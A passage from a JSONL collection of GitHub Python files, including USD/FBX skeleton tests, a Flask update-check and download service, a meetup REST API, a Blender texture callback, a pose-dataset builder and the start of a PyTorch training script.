Usd.TraverseInstanceProxies())\n\n bindings = cache.ComputeSkelBindings(root, Usd.TraverseInstanceProxies())\n assert bindings\n for binding in bindings:\n assert binding.GetSkeleton()\n query = cache.GetSkelQuery(binding.GetSkeleton())\n assert query\n skinning_xforms = query.ComputeSkinningTransforms(Usd.TimeCode.Default())\n assert len(skinning_xforms) == 3\n # Iterate over the prims that are skinned by this Skeleton.\n for skinning_query in binding.GetSkinningTargets():\n skinned_prim = skinning_query.GetPrim()\n assert skinned_prim\n assert skinned_prim.GetName() == nodes[-1].name\n\n binding_api = UsdSkel.BindingAPI(skinned_prim)\n assert binding_api\n\n joints_attr = binding_api.GetJointsAttr()\n assert joints_attr, \"The plugin must define skel:joints\"\n\n joint_indices_attr = binding_api.GetJointIndicesAttr()\n assert (\n joint_indices_attr\n ), \"The plugin must define primvars:skel:jointIndices\"\n\n joint_weights_attr = binding_api.GetJointWeightsAttr()\n assert (\n joint_weights_attr\n ), \"The plugin must define primvars:skel:jointWeights\"\n\n indices_primvar = UsdGeom.Primvar(joint_indices_attr)\n weights_primvar = UsdGeom.Primvar(joint_weights_attr)\n assert (\n weights_primvar.GetElementSize() == indices_primvar.GetElementSize()\n ), \"Weights and indices must match in elementSize!\"\n\n\n@pytest.fixture(\n params=[\n (\n \"Visibility\",\n False,\n \"\",\n None,\n 0.0,\n 1.0,\n ),\n (\n \"some_float_property\",\n True,\n \"Number\",\n fbx.EFbxType.eFbxFloat,\n -10.0,\n 10.0,\n ),\n ],\n scope=\"session\",\n)\ndef animated_bone_properties_fbx(fbx_defaults, fbx_animation_time_codes, request):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n fbx_property_data = request.param\n fbx_times = fbx_animation_time_codes[0]\n\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n builder.settings.anim_layers = (\"Base\",)\n\n curve = AnimationCurve(\n anim_layer=\"Base\", times=fbx_times, values=list(fbx_property_data[4:])\n )\n fbx_property = Property(\n name=fbx_property_data[0],\n animation_curves=[curve],\n value=fbx_property_data[4],\n user_defined=fbx_property_data[1],\n data_name_and_type=(fbx_property_data[2:4])\n if fbx_property_data[3] is not None\n else None,\n )\n\n a = Joint(name=\"A\", is_root=True)\n b = Joint(name=\"B\", parent=a, properties=[fbx_property])\n c = Joint(name=\"C\", parent=b)\n d = Joint(name=\"D\", parent=c, properties=[fbx_property])\n builder.nodes.extend([a, b, c, d])\n\n expected = (\n f\"userProperties:{fbx_property_data[0]}\", # property name\n 2, # num values per timesample\n (\"A/B\", \"A/B/C/D\"), # owners\n )\n yield str(builder.settings.file_path), builder.nodes, expected\n\n\ndef test_animated_bone_properties(animated_bone_properties_fbx, root_prim_name):\n file_path, nodes, expected = animated_bone_properties_fbx\n stage = Usd.Stage.Open(file_path)\n\n anim_prim = stage.GetPrimAtPath(f\"/{root_prim_name}/Animation{nodes[0].name}\")\n assert anim_prim\n anim_node = UsdSkel.Animation(anim_prim)\n assert anim_node\n\n prop_name, values_per_sample, owners = expected\n attr = anim_prim.GetAttribute(prop_name)\n\n assert attr\n assert attr.GetNumTimeSamples()\n assert attr.GetTimeSamples()\n assert set([len(attr.Get(Usd.TimeCode(x))) for x in attr.GetTimeSamples()]) == {\n values_per_sample\n }\n\n owner_attr = anim_prim.GetAttribute(f\"{prop_name}:owner\")\n assert owner_attr\n assert owner_attr.Get() == owners\n\n\n# NOTE: This could be moved to test_skeleton.py\n@pytest.fixture(\n params=[(f\"child{c}\", \"child_\") for c in string.punctuation + string.whitespace]\n)\ndef simple_skeleton_dirty_names_fbx(fbx_defaults, request):\n output_dir, manager, scene, fbx_file_format = fbx_defaults\n input_name, expected_name = request.param\n with scenebuilder.SceneBuilder(manager, scene, output_dir) as builder:\n builder.settings.file_format = fbx_file_format\n root_node = Joint(name=\"root\", is_root=True)\n child_1 = Joint(name=f\"{input_name}1\", parent=root_node)\n child_2 = Joint(name=f\"{input_name}2\", parent=child_1)\n builder.nodes.extend([root_node, child_1, child_2])\n yield str(builder.settings.file_path), builder.nodes, (\n \"root\",\n f\"root/{expected_name}1\",\n f\"root/{expected_name}1/{expected_name}2\",\n )\n\n\ndef test_skeletonCleanedNames(simple_skeleton_dirty_names_fbx, root_prim_name):\n file_path, nodes, expected_topology = simple_skeleton_dirty_names_fbx\n stage = Usd.Stage.Open(file_path)\n\n skel = UsdSkel.Skeleton(stage.GetPrimAtPath(f\"/{root_prim_name}/root\"))\n cache = UsdSkel.Cache()\n query = cache.GetSkelQuery(skel)\n\n joint_order = query.GetJointOrder()\n assert joint_order == expected_topology\n","repo_name":"Remedy-Entertainment/usdFBX","sub_path":"tests/test_skeleton.py","file_name":"test_skeleton.py","file_ext":"py","file_size_in_byte":14500,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"53"} +{"seq_id":"12894303816","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport os\nimport json\nimport platform\n\nfrom flask import Blueprint, request, jsonify, send_from_directory, abort, make_response\n\n# , Flask\nfrom conf.updatecheck_params_define import *\nfrom service.updatecheck import version_check_functions\n\nupdatecheck_blueprint = Blueprint('updatecheck', __name__)\n\nlog_path = get_logger_file(name='updatecheck.log')\nupdatecheck_logger = configure_logger('updatecheck', log_path)\n\n# 推送beta版本的qtalk\n# global_user_white_list = {'lffan.liu@ejabhost1', 'xi.ma@ejabhost1', 'yusy.song@ejabhost1',\n# 'ju.ma@ejabhost1', 'dan.liu@ejabhost1', 'chaocc.wang@ejabhost1'}\n\n# global_user_black_list = {'lei.lei@ejabhost1', 'xinyu.yang@ejabhost1'}\n\n\ndef download_file(filename, beta=False):\n global localDir\n\n try:\n params = filename.split(\"/\")\n\n realname = filename.replace(\"%s/\" % params[0], '', 1)\n\n if params[0].lower() == \"linux\":\n workerDir = linuxDir\n updater_name = 'updater'\n elif params[0].lower() == \"mac\":\n\n workerDir = macDir if beta else macProdDir\n updater_name = 'updater'\n # return jsonify({\"ret\": 0, \"err_msg\": \"platform %s is not support yet...\" % platform})\n elif params[0].lower() == \"pc32\":\n workerDir = windows32Dir if beta else windows32ProcDir\n updater_name = 'updater.exe'\n elif params[0].lower() == \"pc64\":\n workerDir = windows64Dir if beta else windows64ProdDir\n updater_name = 'updater.exe'\n else:\n return {\"ret\": 0, \"err_msg\": \"platform %s is not support yet...\" % platform}\n\n path = os.path.join(workerDir, realname)\n updatecheck_logger.debug(\"path is \" + path)\n if os.path.isfile(path):\n updatecheck_logger.debug(\"file exist\")\n response = make_response(\n send_from_directory(os.path.join(workerDir, 'static'), filename, as_attachment=True))\n updatecheck_logger.debug(\"response is {}\".format(response))\n\n response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(\n filename.encode().decode('latin-1'))\n return response\n # return send_from_directory(localDir, filename, as_attachment=True)\n except Exception as e:\n updatecheck_logger.error(\"path error! \" + str(e))\n abort(404)\n abort(405)\n\n\ndef upload_file(filename):\n pass\n\n\n@updatecheck_blueprint.route('/updatecheck', defaults={'path': ''})\n@updatecheck_blueprint.route('/updatecheck/<path:path>', methods=['GET', 'POST'])\ndef catch_all(path):\n root = request.url.replace(path, '')\n if path.startswith(\"download/\"):\n return download_file(path[9:])\n elif path.startswith(\"betadownload/\"):\n return download_file(path[13:],beta=True)\n elif path.startswith(\"upload/\"):\n return upload_file(path[7:])\n elif path == \"tools/test\":\n return jsonify(version_check_functions.running_test())\n elif path == \"version/reload\":\n content = request.json\n pm = content['platform']\n return jsonify(version_check_functions.reload_version(root, content))\n elif path == \"version/check\":\n # platform = request.args.get('platform')\n # filename = request.args.get('f')\n content = request.json\n if not content:\n try:\n content = json.loads(request.data)\n except:\n updatecheck_logger.warning(\"CANT FIND CONTENT {}\".format(request.data))\n content = []\n\n return jsonify(version_check_functions.check_version(root, content))\n else:\n return \"Welcome!\"\n\n\n@updatecheck_blueprint.route('/checkupdater', methods=['GET', 'POST'])\ndef version_compare():\n args = request.args\n user = args.get('user', '')\n exec = args.get('exec', '').lower()\n version = int(args.get('version', 0))\n __platform = args.get('platform').lower()\n if not __platform or not exec:\n abort(405)\n if exec != \"qtalk\":\n return jsonify(ret=True, link='')\n\n if user in global_user_black_list:\n return jsonify(ret=True, link='')\n elif version < current_updater_version:\n if __platform == 'pc32':\n return jsonify(ret=True, link=pc32_link)\n elif __platform == 'pc64':\n return jsonify(ret=True, link=pc64_link)\n elif __platform == 'linux':\n return jsonify(ret=True, link=linux_link)\n elif __platform == 'mac':\n return jsonify(ret=True, link=macos_link)\n else:\n return jsonify(ret=True, link='')\n else:\n return jsonify(ret=True, link='')\n\n\n\n","repo_name":"gtouchgogo/qtalk_search","sub_path":"service/updatecheck/updatecheck.py","file_name":"updatecheck.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13477275192","text":"\"\"\"Meetup Views Module\"\"\"\n# Third Party Imports.\nimport json\nfrom flask import Response\nfrom flask_restplus import reqparse, Resource\n\n\n# Local Imports\nfrom ..models.meetup_model import Meetup\nfrom ..utils.serializer import MeetupDataTransferObject\n\nmeetup_api = MeetupDataTransferObject.meetup_namespace\n\nparser = reqparse.RequestParser()\n# Meetup Arguments\nparser.add_argument(\"location\", type=str ,required=True, help=\"Please enter meetup location.\")\nparser.add_argument(\"image1\", required=True, help=\"Please enter meetup image.\")\nparser.add_argument(\"image2\", help=\"Please enter meetup image.\")\nparser.add_argument(\"image3\", help=\"Please enter meetup image.\")\nparser.add_argument(\"topic\", type=str ,required=True, help=\"Please enter meetup topic.\")\nparser.add_argument(\"happening_on\", type=str ,required=True, help=\"Please enter meetup date.\")\nparser.add_argument(\"tag1\", required=True, help=\"Please enter meetup tag.\")\nparser.add_argument(\"tag2\", required=True, help=\"Please enter meetup tag.\")\nparser.add_argument(\"tag3\", required=True, help=\"Please enter meetup tag.\")\n\nmeetup_request_model = MeetupDataTransferObject.meetup_request_model\n\n@meetup_api.route('', '/upcoming')\nclass MeetupList(Resource):\n \"\"\"Meetup endpoint.\"\"\"\n @meetup_api.expect(meetup_request_model, validate=True)\n def post(self):\n \"\"\"Performing a POST request.\"\"\"\n request_data = parser.parse_args()\n location = request_data[\"location\"]\n image1 = request_data[\"image1\"]\n image2 = request_data[\"image2\"]\n image3 = request_data[\"image3\"]\n topic = request_data[\"topic\"]\n happening_on = request_data[\"happening_on\"]\n tag1 = request_data[\"tag1\"]\n tag2 = request_data[\"tag2\"]\n tag3 = request_data[\"tag3\"]\n\n images = [image1, image2, image3]\n tags = [tag1, tag2, tag3]\n\n new_meetup = Meetup(location, images, topic, happening_on, tags)\n create_meetup = new_meetup.create_new_meetup()\n response_payload = dict(\n status=201,\n message=\"Meetup was created successfully.\",\n data=create_meetup\n )\n response = Response(json.dumps(response_payload), status=201, mimetype=\"application/json\")\n return response\n\n\n def get(self):\n \"\"\"Fetching All Meetups\"\"\"\n meetups = Meetup.fetch_all_meetups(self)\n response_payload = {\n \"status\": 200,\n \"data\": meetups\n }\n response = Response(json.dumps(response_payload), status=200, mimetype=\"application/json\")\n return response\n\n@meetup_api.route('/<int:meetup_id>')\nclass SingleMeetup(Resource):\n \"\"\"Deals with operations on single meetup record.\"\"\"\n def get(self, meetup_id):\n \"\"\"Getting a specific meetup\"\"\"\n meetup = Meetup.fetch_single_meetup(meetup_id)\n response_payload = {\n \"status\": 200,\n \"data\": meetup\n }\n response = Response(json.dumps(response_payload), status=200, mimetype=\"application/json\")\n return response\n\n","repo_name":"TheAlchemistKE/Questioner-API","sub_path":"app/api/v1/views/meetup_views.py","file_name":"meetup_views.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"126087064","text":"# Author: Axel Antoine\n# https://axantoine.com\n# 01/26/2021\n\n# Loki, Inria project-team with Université de Lille\n# within the Joint Research Unit UMR 9189 CNRS-Centrale\n# Lille-Université de Lille, CRIStAL.\n# https://loki.lille.inria.fr\n\n# LICENCE: Licence.md\n\nimport bpy\nimport os\nfrom bpy.app.handlers import persistent\nimport bgl\n\nSCREEN_TAG = \"EScreen\"\n\n@persistent\ndef detect_interface_callback(dummy):\n\tif bpy.context.scene.esquisse.is_rendering:\n\t\treturn\n\t\t\n\tfor obj in bpy.context.scene.objects:\n\t\tif obj.esquisse.isScreen :\n\t\t\tif obj.esquisse.screen_properties.use_interface:\n\t\t\t\t\n\t\t\t\ttexture_path = bpy.path.abspath(obj.esquisse.screen_properties.interface_path)[:-3] + \"png\"\n\n\t\t\t\tif not obj.esquisse.screen_properties.texture_loaded:\n\t\t\t\t\t# Try to load the texture (PNG) with the same interface name\n\n\t\t\t\t\t# Check if file exists\n\t\t\t\t\tif os.path.isfile(texture_path):\n\n\t\t\t\t\t\t# Load the texture in the blender data\n\t\t\t\t\t\ttexture = bpy.data.images.load(texture_path)\n\n\t\t\t\t\t\t# Iterate over the current images stored in blender to get the key of the new image (should be filename, but not sure)\n\t\t\t\t\t\ttexture_id = None\n\t\t\t\t\t\tfor item in bpy.data.images.items():\n\t\t\t\t\t\t\tkey, value = item\n\t\t\t\t\t\t\tif value == texture:\n\t\t\t\t\t\t\t\ttexture_id = key\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t# Set the texture as loaded\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_loaded = True\n\t\t\t\t\t\t# Set the texture identifier of blender data images\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_id = texture_id\n\n\t\t\t\t\t\tprint(\"Loaded %s texture in blender images for screen : %s.\"%(texture_id,obj.name))\n\n\t\t\t\telse:\n\t\t\t\t\t# Check if the loaded texture for the screen still has changed or is still loaded\n\t\t\t\t\tif obj.esquisse.screen_properties.texture_id not in bpy.data.images.keys():\n\t\t\t\t\t\t# Delete current texture identifier in blender data\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_id = \"\"\n\t\t\t\t\t\t# Set the texture for the current screen obj as not loaded to be loaded in the next function callback call\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_loaded = False\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\t# get the filepath of the current texture stored in blender data for the current screen obj\n\n\t\t\t\t\tloaded_texture = bpy.data.images[obj.esquisse.screen_properties.texture_id]\n\n\t\t\t\t\t# check if the current screen obj interface path is the same stored in blender data\n\t\t\t\t\tif not loaded_texture.filepath == texture_path:\n\n\t\t\t\t\t\t# If filepath different, then it's a different texture\n\t\t\t\t\t\t# Remove texture from blender data\n\t\t\t\t\t\tbpy.data.images.remove(loaded_texture)\n\t\t\t\t\t\t# Delete current texture identifier in blender data\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_id = \"\"\n\t\t\t\t\t\t# Set the texture for the current screen obj as not loaded to be loaded in the next function callback call\n\t\t\t\t\t\tobj.esquisse.screen_properties.texture_loaded = False\n\n@persistent\ndef load_default_interface(dummy):\n\tdir_path = os.path.dirname(os.path.realpath(__file__))\n\tfilename = 'Esquisse_Default_interface.png'\n\ttexture_path = dir_path +\"/\" + filename\n\tif not os.path.exists(texture_path):\n\t\tprint(\"Can't find default interface %s\", texture_path)\t\t\n\t\treturn\n\n\ttexture = None\n\tif filename not in bpy.data.images.keys():\n\t\ttexture = bpy.data.images.load(texture_path)\n\n\tfor obj in bpy.context.scene.objects:\n\t\tif obj.esquisse.isScreen:\n\t\t\tobj.esquisse.screen_properties.default_texture_id = filename\n\n\n\n\ndef register():\t\n\tbpy.app.handlers.scene_update_post.append(detect_interface_callback)\n\tbpy.app.handlers.scene_update_post.append(load_default_interface)\n\t\n\ndef unregister():\n\tbpy.app.handlers.scene_update_post.remove(detect_interface_callback)\n\tbpy.app.handlers.scene_update_post.remove(load_default_interface)\n\n","repo_name":"LokiResearch/EsquisseBlender","sub_path":"code/Esquisse/callback_textures_loading.py","file_name":"callback_textures_loading.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"9025656058","text":"from Package.BaseDev.tools import BaseTool\nimport torch\n\n\nclass DevTool(BaseTool):\n def __init__(self):\n pass\n\n @staticmethod\n def make_target(\n batch_size: int,\n is_real_image: bool,\n *args,\n **kwargs\n ) -> torch.Tensor:\n if is_real_image:\n res = torch.ones(size=(batch_size, ), dtype=torch.float32)\n\n else:\n res = torch.zeros(size=(batch_size, ), dtype=torch.float32)\n return res\n\n @staticmethod\n def split_target(\n *args,\n **kwargs\n ):\n raise RuntimeError(\n \"we do not need this method(split_target)!\"\n )\n\n @staticmethod\n def split_predict(\n *args,\n **kwargs\n ):\n raise RuntimeError(\n \"we do not need this method(split_predict)!\"\n )\n","repo_name":"diyage/AllYouNeed","sub_path":"Package/Task/GAN/D2/Dev/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"12224625576","text":"from glob import glob\nimport os\nfrom subprocess import call\n\nimport cv2\nimport h5py\nfrom matplotlib import pyplot as plt\nimport matplotlib.animation as animation\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\ndef parse_cam_cfg(fname):\n \"\"\"\n Parse camera configuration YAML file generated w/ OpenCV\n :param fname: str, camera configuration file name\n :return: dict, camera configuration\n \"\"\"\n f = cv2.FileStorage(fname, cv2.FILE_STORAGE_READ)\n cam_cfg = {}\n cam_cfg[\"K\"] = f.getNode(\"Camera_1\").getNode(\"K\").mat().astype(np.float32)\n cam_cfg[\"dist\"] = f.getNode(\"Camera_1\").getNode(\"Dist\").mat().astype(np.float32)\n cam_cfg[\"resolution\"] = (\n int(f.getNode(\"Camera_1\").getNode(\"imgHeight\").real()),\n int(f.getNode(\"Camera_1\").getNode(\"imgWidth\").real()))\n\n return cam_cfg\n\n\ndef parse_video(video_dir, frames_indices):\n \"\"\"\n Read RGB and depth video from a given folder\n :param video_dir: str, directory with RGB + depth frames\n :return: np.arrays, depth and rgb videos\n \"\"\"\n rgb = []\n depth = []\n for frame_idx in frames_indices:\n frame_idx = int(frame_idx)\n rgb_frame = glob(os.path.join(video_dir, \"*color_%05d*\" % frame_idx))\n depth_frame = glob(os.path.join(video_dir, \"*depth_%05d*\" % frame_idx))\n rgb.append(cv2.imread(rgb_frame[0], -1)[:, :, ::-1])\n depth.append(cv2.imread(depth_frame[0], -1))\n\n return np.array(rgb), np.array(depth)\n\n\ndef parse_mocap(fname, joints_names, frames_indices):\n \"\"\"\n Parse mocap data in a given BVH file\n :param fname: str, bvh file name\n :param joints_names: list, required joints names\n :param num_frames_in_video: int, number of frames in video\n :return: np.arrays, 2d and 3d joints\n \"\"\"\n data = np.genfromtxt(fname, dtype=float, delimiter=',', names=True)\n full_pose_3d = []\n for frame_idx in frames_indices:\n frame_idx = int(frame_idx) + 1\n pose_3d = []\n for joint in joints_names:\n joint_pos = (data[joint + \"X\"][frame_idx], data[joint + \"Y\"][frame_idx], data[joint + \"Z\"][frame_idx])\n pose_3d.append(joint_pos)\n full_pose_3d.append(pose_3d)\n\n return np.array(full_pose_3d) * 10\n\n\ndef bmhad_to_ours(joints):\n num_frames = joints.shape[0]\n new_joints = np.zeros((num_frames, 12, joints.shape[2]))\n head_sizes = np.zeros((num_frames))\n\n for idx, current_joints in enumerate(joints):\n new_joints[idx, 0] = np.mean(current_joints[:2], axis=0).astype(joints.dtype) # head\n new_joints[idx, 1:7] = current_joints[2:8]\n new_joints[idx, 7:9] = current_joints[9:11]\n new_joints[idx, 9:11] = current_joints[12:14]\n new_joints[idx, 11] = np.mean(current_joints[np.array([8, 11])], axis=0).astype(joints.dtype) # pelvis\n head_sizes[idx] = np.linalg.norm(current_joints[0] - current_joints[1])\n\n return new_joints, head_sizes\n\n\ndef get_cam_params(cam):\n \"\"\"\n Get camera parameters\n :param cam: str, cam ID\n :return: dict, np.array - camera parameters, camera world coordinates\n \"\"\"\n # KINECT params\n K = {}\n if cam == \"k02\":\n K[\"R\"] = np.reshape([-0.798016667, - 0.041981064, 0.601171315, -0.059102636, -0.987309396, -0.147400886, 0.599730134, -0.153159171, 0.785408199], (3, 3)).T.astype(np.float64)\n K[\"t\"] = np.array([[26.147224426, 853.124328613, 2533.297607422]]).T.astype(np.float64)\n K[\"K\"] = np.reshape([532.33691406, 0., 323.22338867, 0., 532.80218506, 265.27493286, 0., 0., 1.], (3, 3)).astype(np.float64)\n K[\"d\"] = np.array([0.18276334, -0.35502717, -6.75550546e-004, -9.90863307e-004]).T.astype(np.float64)\n elif cam == \"k01\":\n K[\"R\"] = np.reshape([0.869593024, 0.005134047, -0.493742496, 0.083783410, -0.986979902, 0.137298822, -0.486609042, -0.160761520, -0.858700991], (3, 3)).T.astype(np.float64)\n K[\"t\"] = np.array([[-844.523864746, 763.838439941, 3232.193359375]]).T.astype(np.float64)\n K[\"K\"] = np.reshape([531.49230957, 0., 314.63775635, 0., 532.39190674, 252.53335571, 0., 0., 1.], (3, 3)).astype(np.float64)\n K[\"d\"] = np.array([0.19607373, -0.36734107, -2.47962005e-003, -1.89774996e-003]).T.astype(np.float64)\n else:\n raise Exception(\"Unknown cam: %s\" % cam)\n\n K[\"T\"] = np.append(np.append(K[\"R\"].T, K[\"t\"], axis=1), np.array([[0, 0, 0, 1]]).astype(np.float64), axis=0).astype(np.float64)\n\n return K\n\ndef project_points(K, joints):\n \"\"\"\n Project world coordinates into image plane given camera parameters.\n :param K: dict, camera parameters\n :param joints: np.array, world coordinates\n :return: np.array, image plane coordinates\n \"\"\"\n # Homogeneous transformation matrix from world coordinate frame to camera coordinate frame\n joints = np.float32(joints).reshape(-1,3)\n new_joints = np.zeros_like(joints)\n new_joints[:, 0] = joints[:, 1]\n new_joints[:, 1] = joints[:, 2]\n new_joints[:, 2] = joints[:, 0]\n rvec = cv2.Rodrigues(K[\"R\"].T)[0]\n\n joints_2d, _ = cv2.projectPoints(new_joints, rvec, K[\"t\"], K[\"K\"], K[\"d\"])\n joints_3d = np.zeros_like(joints)\n for idx, joint in enumerate(new_joints):\n joints_3d[idx] = np.dot(K[\"T\"], np.append(joint, [1]).T)[:3]\n\n return np.squeeze(joints_2d), joints_3d\n\n\ndef build_dataset(fname, data_dir, scene_code, debug=False):\n \"\"\"\n Build a HDF5 dataset for the given subjects, actions, repetitions and cameras\n :param fname: str, resulting HDF5 file name\n :param data_dir: str, path to data folder\n :param scene_code: str, code for scene to be included in the dataset (subjectIDactionIDrepetitionID)\n :return: HDF5 object, resulting dataset\n \"\"\"\n joint_order = [\"HeadEnd\", \"Head\"]\n joint_order += [\"RightArm\", \"RightForeArm\", \"RightHand\"]\n joint_order += [\"LeftArm\", \"LeftForeArm\", \"LeftHand\"]\n joint_order += [\"RightUpLeg\", \"RightLeg\", \"RightFoot\"]\n joint_order += [\"LeftUpLeg\", \"LeftLeg\", \"LeftFoot\"]\n\n joint_order_fancier = [\"head\"]\n joint_order_fancier += [\"right_shoulder\", \"right_elbow\", \"right_hand\"]\n joint_order_fancier += [\"left_shoulder\", \"left_elbow\", \"left_hand\"]\n joint_order_fancier += [\"right_knee\", \"right_foot\"]\n joint_order_fancier += [\"left_knee\", \"left_foot\"]\n joint_order_fancier += [\"pelvis\"]\n\n scene_dir = os.path.join(data_dir, scene_code)\n\n f = h5py.File(fname, mode=\"w\")\n f.attrs[\"joint_order\"] = joint_order_fancier\n\n # Calibration\n calibration_dtype = np.dtype([\n (\"K\", np.float32, (3, 3)),\n (\"R\", np.float32, (3, 3)),\n (\"t\", np.float32, (3)),\n (\"dist\", np.float32, (4)),\n (\"resolution\", np.uint16, (2)),\n ])\n\n cam_id = \"k\" + scene_code.split(\"k\")[-1]\n cam_cfg_fname = os.path.join(data_dir, \"camcfg_%s.yml\" % cam_id)\n cam_cfg = parse_cam_cfg(cam_cfg_fname)\n\n # Pose and image data\n corr_frames = np.loadtxt(glob(os.path.join(scene_dir, \"corr*.txt\"))[0])\n num_frames = corr_frames.shape[0]\n\n im_height, im_width = cam_cfg[\"resolution\"]\n pose_dtype = np.dtype([\n (\"camera_id\", np.str_, 20),\n (\"subject_id\", np.str_, 20),\n (\"action_id\", np.str_, 20),\n (\"repetition_id\", np.str_, 20),\n (\"rgb_video\", np.uint8, (num_frames, im_height, im_width, 3)),\n (\"depth_video\", np.uint16, (num_frames, im_height, im_width)),\n (\"pose_2d\", np.float32, (num_frames, 12, 2)),\n (\"pose_3d\", np.float32, (num_frames, 12, 3)),\n (\"pose_3d_world\", np.float32, (num_frames, 12, 3)),\n (\"head_sizes_2d\", np.float32, (num_frames)),\n (\"head_sizes_3d\", np.float32, (num_frames)),\n ])\n f.create_dataset(\"calibration\", (1,), calibration_dtype)\n\n f.create_dataset(\"pose\", (1,), pose_dtype)\n\n video_frames = corr_frames[:, 0]\n rgb, depth = parse_video(os.path.join(scene_dir, \"video\"), video_frames)\n\n mocap_frames = corr_frames[:, 2]\n\n call([\"bvh-converter\", glob(os.path.join(scene_dir, \"*.bvh\"))[0]])\n joints_3d_world = parse_mocap(glob(os.path.join(scene_dir, \"*.csv\"))[0], joint_order, mocap_frames)\n\n K = get_cam_params(cam_id)\n\n joints_3d_aux = joints_3d_world.copy()\n joints_3d_world[:, :, 0] = joints_3d_aux[:, :, 2]\n joints_3d_world[:, :, 1] = joints_3d_aux[:, :, 0]\n joints_3d_world[:, :, 2] = joints_3d_aux[:, :, 1]\n joints_2d = np.zeros((joints_3d_world.shape[0], joints_3d_world.shape[1], 2))\n joints_3d_camera = np.zeros_like(joints_3d_world)\n for frame_idx, skel in enumerate(joints_3d_world):\n joints_2d[frame_idx], joints_3d_camera[frame_idx] = project_points(K, skel)\n\n joints_3d_world, _ = bmhad_to_ours(joints_3d_world)\n joints_3d_camera, head_sizes_3d = bmhad_to_ours(joints_3d_camera)\n joints_2d, head_sizes_2d = bmhad_to_ours(joints_2d)\n\n if debug:\n fig = plt.figure()\n ax1 = fig.add_subplot(121)\n ax2 = fig.add_subplot(122, projection='3d')\n\n def animate(i):\n ax1.clear()\n ax1.scatter(joints_2d[i, :, 0], joints_2d[i, :, 1], s=30)\n for idx, joint_2d in enumerate(joints_2d[i]):\n ax1.text(joint_2d[0] + 5, joint_2d[1] + 5, str(idx), color=\"red\", fontsize=9)\n ax1.imshow(rgb[i])\n\n ax2.clear()\n ax2.scatter(joints_3d_camera[i, :, 2], joints_3d_camera[i, :, 0], -joints_3d_camera[i, :, 1])\n ax2.set_xlim(2000, 4000)\n ax2.set_ylim(-1500, 500)\n ax2.set_zlim(-1000, 1000)\n ax2.view_init(30, i * 2)\n\n Writer = animation.writers['ffmpeg']\n writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)\n ani = animation.FuncAnimation(fig, animate, interval=1, save_count=num_frames)\n ani.save(os.path.join(data_dir, '%s.mp4' % scene_code), writer=writer)\n\n calibration = np.array((K[\"K\"], K[\"R\"], np.squeeze(K[\"t\"]), K[\"d\"], cam_cfg[\"resolution\"]), dtype=calibration_dtype)\n f[\"calibration\"][0] = calibration\n\n pose = np.array((\n cam_id,\n \"s\" + scene_code.split(\"s\")[-1][:2],\n \"a\" + scene_code.split(\"a\")[-1][:2],\n \"r\" + scene_code.split(\"r\")[-1][:2],\n rgb,\n depth,\n joints_2d,\n joints_3d_camera,\n joints_3d_world,\n head_sizes_2d,\n head_sizes_3d,\n ), dtype=pose_dtype)\n f[\"pose\"][0] = pose\n\n return f\n\n\nif __name__ == \"__main__\":\n data_dir = \"/home/dpascualhe/repos/2017-tfm-david-pascual/src/Estimator/Tests/Datasets/BMHAD\"\n for scene_dir in glob(data_dir + \"/*r02*/\"):\n scene_code = scene_dir.split(\"/\")[-2]\n print(\"Parsing %s\" % scene_code)\n fname = os.path.join(data_dir, \"hdf5/bmhad_%s.h5\" % scene_code)\n dataset = build_dataset(fname, data_dir, scene_code=scene_code, debug=True)\n dataset.close()\n","repo_name":"RoboticsLabURJC/2017-tfm-david-pascual","sub_path":"src/Estimator/Tests/Datasets/build_bmhad_dataset.py","file_name":"build_bmhad_dataset.py","file_ext":"py","file_size_in_byte":10715,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35037103326","text":"# Imports here\nimport matplotlib.pyplot as plt\nimport torch \nfrom torchvision import datasets, transforms, models\nfrom torch import nn\nfrom torch import optim \nimport torch.nn.functional as F \nfrom collections import OrderedDict\nfrom PIL import Image\nimport numpy as np\nfrom torch.autograd import Variable\nimport argparse\nimport time\nimport json\n\n#initiatie variables with default values:\n\narch= 'vgg19'\nhidden_units=1024\nlearning_rate= 0.001\nepochs= 5\ndevice= 'cpu' \n#------------------------------------------------\nparser = argparse.ArgumentParser()\nparser.add_argument('--data_dir',type= str, help='train on the data directory')\nparser.add_argument('--save_dir',action='store', help='the path where to save the checkpoint')\nparser.add_argument('--arch', default='vgg19',action='store',type=str, help='choose among 3 pretrained networks: vgg19, alexnet,densenet121')\nparser.add_argument('--learning_rate',action='store', type=float, default=0.001, help='choose a float No. as the learning rate for the model')\nparser.add_argument('--hidden_units',action='store', type=int, default=1024)\nparser.add_argument('--epochs', type=int, default=5)\nparser.add_argument('--gpu', action='store_true')\nargs = parser.parse_args()\n#------------------------------------------------\n#select parameters entered in command line:\n\nif args.arch:\n arch=args.arch\n \nif args.hidden_units:\n hidden_units= args.hidden_units\n \nif args.learning_rate:\n learning_rate= args.learning_rate\n \nif args.epochs:\n epochs= args.epochs\n \nif args.gpu:\n #initialize device to run on (GPU or CPU) \n device=torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n \n 